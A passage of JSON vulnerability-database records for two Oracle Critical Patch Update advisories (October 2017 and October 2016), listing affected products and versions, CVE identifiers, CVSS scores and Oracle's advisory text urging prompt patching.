"le"}, {"name": "Oracle Secure Global Desktop (SGD)", "version": "5.3", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.7", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "11.4.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.3", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.56", "operator": "le"}, {"name": "Tekelec HLR Router", "version": "4.x", "operator": "le"}, {"name": "Oracle Retail Markdown Optimization", "version": "14.0", "operator": "le"}, {"name": "Oracle Hospitality Suite8", "version": "8.10.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u144", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.1.2", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.2.7", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.19", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.7", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.2.0", "operator": "le"}, {"name": "Oracle BI Publisher", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.7", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.2.0.1", "operator": "le"}, {"name": "Java SE, JRockit", "version": "7u151", "operator": "le"}, {"name": "Oracle Communications Order and Service Management", "version": "7.3.1.x.x", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.1.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.36", "operator": "le"}, {"name": "Oracle Business Process Management Suite", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.1.1", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "13.4", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u151", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Integrator", "version": "3.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u151", "operator": "le"}, {"name": "Oracle API Gateway", "version": "11.1.2.4.0", "operator": "le"}, {"name": "Oracle Managed File Transfer", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.2.7", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Managed File Transfer", "version": "12.2.1.2.0", "operator": "le"}, {"name": "SPARC M7, T7, S7 based Servers", "version": "9.7.6.b", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.7", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.1.30", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.2.x", "operator": "le"}, {"name": "Oracle Hospitality Simphony", "version": "2.7", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.3.0", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Hospitality Cruise Materials Management", "version": "7.30.564.0", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.3", "operator": "le"}, {"name": "WLM (Apache Tomcat)", "version": "12.2.0.1", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.1.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.18", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "15.0.1", "operator": "le"}, {"name": "Oracle Enterprise Manager Ops Center", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Integrator", "version": "3.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "9", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.1.3", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S, M12-1, M12-2, M12-2S Servers", "version": "2340", "operator": "le"}, {"name": "MICROS Retail XBRi Loss Prevention", "version": "10.8.1", "operator": "le"}, {"name": "Oracle Retail Store Inventory Management", "version": "14.0.4", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "14.1", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.4", "operator": "le"}, {"name": "Java SE, JRockit", "version": "9", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.35", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.2.0", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Hyperion Financial Reporting", "version": "11.1.2", "operator": "le"}, {"name": "MICROS Retail XBRi Loss Prevention", "version": "10.0.1", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.1.1", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.4", "operator": "le"}, {"name": "XML Database", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.1.2", "operator": "le"}, {"name": "Siebel CRM Desktop", "version": "16.0", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.5", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.57", "operator": "le"}, {"name": "Siebel CRM Desktop", "version": "17.0", "operator": "le"}, {"name": "Primavera Unifier", "version": "9.14", "operator": "le"}, {"name": "Oracle Advanced Outbound Telephony", "version": "12.2.7", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Java SE, JRockit", "version": "6u161", "operator": "le"}, {"name": "Oracle Advanced Outbound Telephony", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Trade Management", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Trade Management", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Engineering Data Management", "version": "6.1.3.0", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.1.3", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.4", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM eProcurement", "version": "9.1.00", "operator": "le"}, {"name": "Oracle BI Publisher", "version": "11.1.1.7.0", "operator": "le"}, {"name": "JD Edwards World Security", "version": "9.3", "operator": "le"}, {"name": "Java Advanced Management Console", "version": "2.7", "operator": "le"}, {"name": "Oracle Trade Management", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.1.3", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.9.0", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.56", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "11.5", "operator": "le"}, {"name": "Oracle Communications Services Gatekeeper", "version": "5.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "6.5.11", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "14.0", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "13.2", "operator": "le"}, {"name": "Oracle Server X7-2/2L, X7-8", "version": "1.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.1", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.7", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.4.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.3", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.5", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.4", "operator": "le"}, {"name": "Primavera Unifier", "version": "15.x", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.1.1", "operator": "le"}, {"name": "RDBMS Security", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Communications WebRTC Session Controller", "version": "7.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u144", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Communications WebRTC Session Controller", "version": "7.0", "operator": "le"}, {"name": "Oracle Hospitality Reporting and Analytics", "version": "8.5.1", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.2.6", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "9", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1123", "operator": "le"}, {"name": "Sun ZFS Storage Appliance Kit (AK)", "version": "2013", "operator": "le"}, {"name": "Oracle Trade Management", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.5", "operator": "le"}, {"name": "Java SE", "version": "8u144", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.55", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.4.1", "operator": "le"}, {"name": "Primavera Unifier", "version": "9.13", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.1.2", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Integrator", "version": "3.2", "operator": "le"}, {"name": "Oracle Business Process Management Suite", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Managed File Transfer", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Communications Order and Service Management", "version": "7.3.5.x.x", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Advanced Outbound Telephony", "version": "12.2.5", "operator": "le"}, {"name": "Spatial (Apache Groovy)", "version": "12.2.0.1", "operator": "le"}, {"name": "Oracle Retail Markdown Optimization", "version": "13.4", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.9.0", "operator": "le"}, {"name": "RDBMS Security", "version": "12.2.0.1", "operator": "le"}, {"name": "Oracle Virtual Directory", "version": "11.1.1.7.0", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM", "version": "9.2", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "7.1.6", "operator": "le"}, {"name": "Oracle Retail Store Inventory Management", "version": "16.0.1", "operator": "le"}, {"name": "Oracle Communications Unified Session Manager", "version": "7.x", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle Trade Management", "version": "12.1.2", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.1.3", "operator": "le"}, {"name": "Java SE", "version": "9", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Oracle Hyperion BI+", "version": "11.1.2.4", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router (DSR)", "version": "7.x", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.7", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.2", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "6.0.11", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Java VM", "version": "12.2.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.4.2", "operator": "le"}, {"name": "Siebel UI Framework", "version": "17.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "Primavera Unifier", "version": "10.x", "operator": "le"}, {"name": "Management Pack for Oracle GoldenGate", "version": "11.2.1.0.12", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "7.0", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Retail Store Inventory Management", "version": "14.1.3", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.2.4", "operator": "le"}, {"name": "Java SE", "version": "7u151", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "12.x", "operator": "le"}, {"name": "PeopleSoft Enterprise FSCM", "version": "9.2", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.2.4", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM eProcurement", "version": "9.2.00", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.7", "operator": "le"}, {"name": "JD Edwards World Security", "version": "9.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "7.0.6", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.6", "operator": "le"}, {"name": "MySQL Connectors", "version": "6.9.9", "operator": "le"}, {"name": "Java SE, JRockit", "version": "8u144", "operator": "le"}, {"name": "Oracle Communications Billing and Revenue Management", "version": "7.5", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "8.x", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.1.3", "operator": "le"}, {"name": "Siebel Apps - Field Service", "version": "16.0", "operator": "le"}, {"name": "Oracle Engineering Data Management", "version": "6.2.2.0", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.1.2", "operator": "le"}, {"name": "PeopleSoft Enterprise PRTL Interaction Hub", "version": "9.1.00", "operator": "le"}, {"name": "Oracle Hospitality Simphony", "version": "2.6", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.4.2.4181", "operator": "le"}, {"name": "Oracle Business Process Management Suite", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Identity Manager Connector", "version": "9.1.1.5.0", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Hospitality Suite8", "version": "8.10.1", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Trade Management", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.3.0", "operator": "le"}, {"name": "Oracle Advanced Outbound Telephony", "version": "12.2.3", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.2.8.2223", "operator": "le"}, {"name": "Oracle Trade Management", "version": "12.2.3", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.6", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.2.1.3.0", "operator": "le"}, {"name": "Oracle Universal Work Queue", "version": "12.2.7", "operator": "le"}, {"name": "Oracle Hospitality Reporting and Analytics", "version": "9.0.0", "operator": "le"}, {"name": "Oracle Hospitality Cruise Shipboard Property Management System", "version": "8.0.2.0", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "13.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}, {"name": "JD Edwards World Security", "version": "9.2", "operator": "le"}], "cvelist": ["CVE-2017-10324", "CVE-2017-10167", "CVE-2017-10014", "CVE-2017-10417", "CVE-2017-10037", "CVE-2015-5351", "CVE-2015-5254", "CVE-2017-10270", "CVE-2017-10387", "CVE-2017-10360", "CVE-2015-1792", "CVE-2017-10321", "CVE-2017-10060", "CVE-2015-0235", "CVE-2015-1793", "CVE-2017-10404", "CVE-2017-10311", "CVE-2017-10421", "CVE-2017-10353", "CVE-2017-10260", "CVE-2017-10203", "CVE-2016-9840", "CVE-2017-10419", "CVE-2017-10424", "CVE-2017-10399", "CVE-2017-10293", "CVE-2015-3197", "CVE-2017-10299", "CVE-2017-10158", "CVE-2017-10379", "CVE-2017-10414", "CVE-2017-10054", "CVE-2017-10357", "CVE-2017-10197", "CVE-2017-10361", "CVE-2017-10356", "CVE-2016-5019", "CVE-2017-10322", "CVE-2017-10323", "CVE-2017-10066", "CVE-2014-3572", "CVE-2017-5709", "CVE-2016-6306", "CVE-2017-5462", "CVE-2014-3613", "CVE-2017-7502", "CVE-2015-7181", "CVE-2015-0206", "CVE-2017-10369", "CVE-2015-1789", "CVE-2016-2183", "CVE-2017-10349", "CVE-2017-10284", "CVE-2017-10294", "CVE-2017-10325", "CVE-2017-10416", "CVE-2015-0286", "CVE-2017-10341", "CVE-2017-10420", "CVE-2017-10418", "CVE-2017-10367", "CVE-2016-2178", "CVE-2017-10164", "CVE-2013-1903", "CVE-2017-10400", "CVE-2017-3167", "CVE-2017-10281", "CVE-2015-3195", "CVE-2017-10351", "CVE-2017-10359", "CVE-2017-10381", "CVE-2017-10406", "CVE-2017-10348", "CVE-2017-10372", "CVE-2014-8714", "CVE-2017-10034", "CVE-2017-10328", "CVE-2016-0714", "CVE-2016-3092", "CVE-2014-3571", "CVE-2017-10397", "CVE-2017-10388", "CVE-2017-10330", "CVE-2017-10407", "CVE-2014-0076", "CVE-2017-10033", "CVE-2017-10342", "CVE-2017-10415", "CVE-2017-10408", "CVE-2016-6302", "CVE-2017-10344", "CVE-2017-10354", "CVE-2017-10338", "CVE-2017-10296", "CVE-2017-10292", "CVE-2017-10402", "CVE-2014-3587", "CVE-2017-10306", "CVE-2017-10365", "CVE-2017-10337", "CVE-2017-10426", "CVE-2016-8745", "CVE-2016-2177", "CVE-2017-10380", "CVE-2015-0288", "CVE-2017-10332", "CVE-2017-10378", "CVE-2014-0224", "CVE-2017-10026", "CVE-2017-10276", "CVE-2016-0635", "CVE-2017-10409", "CVE-2017-10166", "CVE-2017-10427", "CVE-2017-10422", "CVE-2015-3194", "CVE-2017-10355", "CVE-2017-10163", "CVE-2016-6515", "CVE-2017-10326", "CVE-2015-0285", "CVE-2016-2107", "CVE-2017-10153", "CVE-2016-7055", "CVE-2017-10382", "CVE-2015-7501", "CVE-2017-10364", "CVE-2017-10319", "CVE-2015-3253", "CVE-2017-3731", "CVE-2016-6307", "CVE-2016-0701", "CVE-2017-10398", "CVE-2017-10051", "CVE-2017-10308", "CVE-2017-10320", "CVE-2017-10287", "CVE-2017-10412", "CVE-2017-10334", "CVE-2016-9842", "CVE-2016-2834", "CVE-2017-10283", "CVE-2015-0899", "CVE-2017-10152", "CVE-2017-10264", "CVE-2016-1182", "CVE-2014-0065", "CVE-2016-0763", "CVE-2015-0207", "CVE-2017-10155", "CVE-2017-10271", "CVE-2017-10286", "CVE-2017-10304", "CVE-2016-6308", "CVE-2016-6816", "CVE-2016-7433", "CVE-2014-4342", "CVE-2017-5662", "CVE-2014-8275", "CVE-2016-2180", "CVE-2017-10411", "CVE-2017-10313", "CVE-2017-10194", "CVE-2015-7182", "CVE-2015-0208", "CVE-2015-2808", "CVE-2017-10347", "CVE-2014-3570", "CVE-2017-10227", "CVE-2015-7575", "CVE-2017-10370", "CVE-2017-10261", "CVE-2017-10425", "CVE-2017-5706", "CVE-2015-3196", "CVE-2017-10428", "CVE-2014-3470", "CVE-2017-10362", "CVE-2017-10309", "CVE-2016-2181", "CVE-2017-10391", "CVE-2016-6304", "CVE-2015-3193", "CVE-2017-10263", "CVE-2014-3538", "CVE-2017-10403", "CVE-2014-0114", "CVE-2017-10159", "CVE-2017-10410", "CVE-2017-3732", "CVE-2017-10383", "CVE-2017-10339", "CVE-2017-10340", "CVE-2014-0050", "CVE-2017-10327", "CVE-2017-10396", "CVE-2017-10300", "CVE-2014-3707", "CVE-2014-0064", "CVE-2017-10343", "CVE-2015-0293", "CVE-2017-10165", "CVE-2017-10316", "CVE-2017-3445", "CVE-2017-10373", "CVE-2016-1979", "CVE-2017-10363", "CVE-2017-10352", "CVE-2016-2381", "CVE-2014-8713", "CVE-2017-10279", "CVE-2015-7183", "CVE-2013-0255", "CVE-2017-10314", "CVE-2017-9805", "CVE-2015-1788", "CVE-2017-10055", "CVE-2014-0195", "CVE-2014-0198", "CVE-2017-10161", "CVE-2016-7052", "CVE-2015-0209", "CVE-2014-0063", "CVE-2016-1950", "CVE-2017-10333", "CVE-2015-0204", "CVE-2016-0706", "CVE-2013-0248", "CVE-2017-3733", "CVE-2017-5664", "CVE-2017-10312", "CVE-2017-10366", "CVE-2014-0060", "CVE-2017-10318", "CVE-2016-7429", "CVE-2016-1181", "CVE-2017-10268", "CVE-2017-10285", "CVE-2017-3446", "CVE-2017-10392", "CVE-2017-10413", "CVE-2016-9843", "CVE-2013-2566", "CVE-2016-8735", "CVE-2015-1790", "CVE-2017-10394", "CVE-2017-9788", "CVE-2017-10350", "CVE-2016-6305", "CVE-2016-6303", "CVE-2017-10275", "CVE-2017-10274", "CVE-2017-10190", "CVE-2013-1902", "CVE-2017-10315", "CVE-2015-0291", "CVE-2017-10317", "CVE-2017-10389", "CVE-2017-10385", "CVE-2017-10154", "CVE-2017-10395", "CVE-2017-3588", "CVE-2014-4345", "CVE-2017-10162", "CVE-2003-1418", "CVE-2016-2182", "CVE-2017-10358", "CVE-2017-10310", "CVE-2017-10077", "CVE-2017-10346", "CVE-2014-0062", "CVE-2017-10401", "CVE-2015-0287", "CVE-2017-7668", "CVE-2017-3444", "CVE-2017-10295", "CVE-2017-10393", "CVE-2017-10423", "CVE-2017-10280", "CVE-2017-5461", "CVE-2016-10165", "CVE-2014-0066", "CVE-2015-0289", "CVE-2016-9841", "CVE-2015-7940", "CVE-2017-3169", "CVE-2017-10065", "CVE-2016-5285", "CVE-2017-10368", "CVE-2015-0292", "CVE-2017-10375", "CVE-2017-10384", "CVE-2014-0107", "CVE-2017-10050", "CVE-2016-3506", "CVE-2017-10345", "CVE-2017-10303", "CVE-2017-10302", "CVE-2017-10259", "CVE-2017-10265", "CVE-2015-0290", "CVE-2017-3730", "CVE-2015-0205", "CVE-2017-10329", "CVE-2016-2179", "CVE-2017-10405", "CVE-2017-10277", "CVE-2016-6814", "CVE-2013-1900", "CVE-2015-1787", "CVE-2015-4852", "CVE-2014-0061", "CVE-2014-3569", "CVE-2017-10386", "CVE-2015-1791", "CVE-2017-10336", "CVE-2017-10335", "CVE-2016-7431", "CVE-2017-7679", "CVE-2014-0221", "CVE-2017-10331", "CVE-2017-10099"], "modified": "2018-02-15T00:00:00", "id": "ORACLE:CPUOCT2017-3236626", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:13:57", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 253 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "edition": 3, "reporter": "Oracle", "published": "2016-10-18T00:00:00", "title": "Oracle Critical Patch Update - October 2016", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle Communications Policy Management", "version": "9.9.1", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "12.2.1.0.0", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Financial Services Lending and Leasing", "version": "14.1.0", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "6.5", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.2", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.3.0", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.0", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.1", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.4", "operator": "le"}, {"name": "RDBMS Security", "version": "11.2.0.4", "operator": "le"}, {"name": "Primavera P6 Professional Project Management", "version": "16.x", "operator": "le"}, {"name": "Oracle Shipping Execution", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.0", "operator": "le"}, {"name": "Oracle iRecruitment", "version": "12.2.3", "operator": "le"}, {"name": "Oracle iProcurement", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u111", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "7.3.3", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.3", "operator": "le"}, {"name": "Oracle iRecruitment", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.1.3", "operator": "le"}, {"name": "Siebel Apps - E-Billing", "version": "7.1", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.4", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.5", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.31", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "14.1", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "6.0", "operator": "le"}, {"name": "MySQL Connector", "version": "2.1.3", "operator": "le"}, {"name": "Oracle Application Testing Suite", "version": "12.5.0.1", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.4", "operator": "le"}, {"name": "Oracle iRecruitment", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.1", "operator": "le"}, {"name": "Oracle FLEXCUBE Core Banking", "version": "11.5.0.0.0", "operator": "le"}, {"name": "Java SE", "version": "7u111", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.2", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "8.0.0", "operator": "le"}, {"name": "Primavera P6 Professional Project Management", "version": "8.4", "operator": "le"}, {"name": "Virtual Desktop Infrastructure", "version": "3.5.3", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.1", "operator": "le"}, {"name": "Oracle Financial Services Lending and Leasing", "version": "14.2.0", "operator": "le"}, {"name": "Oracle Secure Backup", "version": "10.4.0.4.0", "operator": 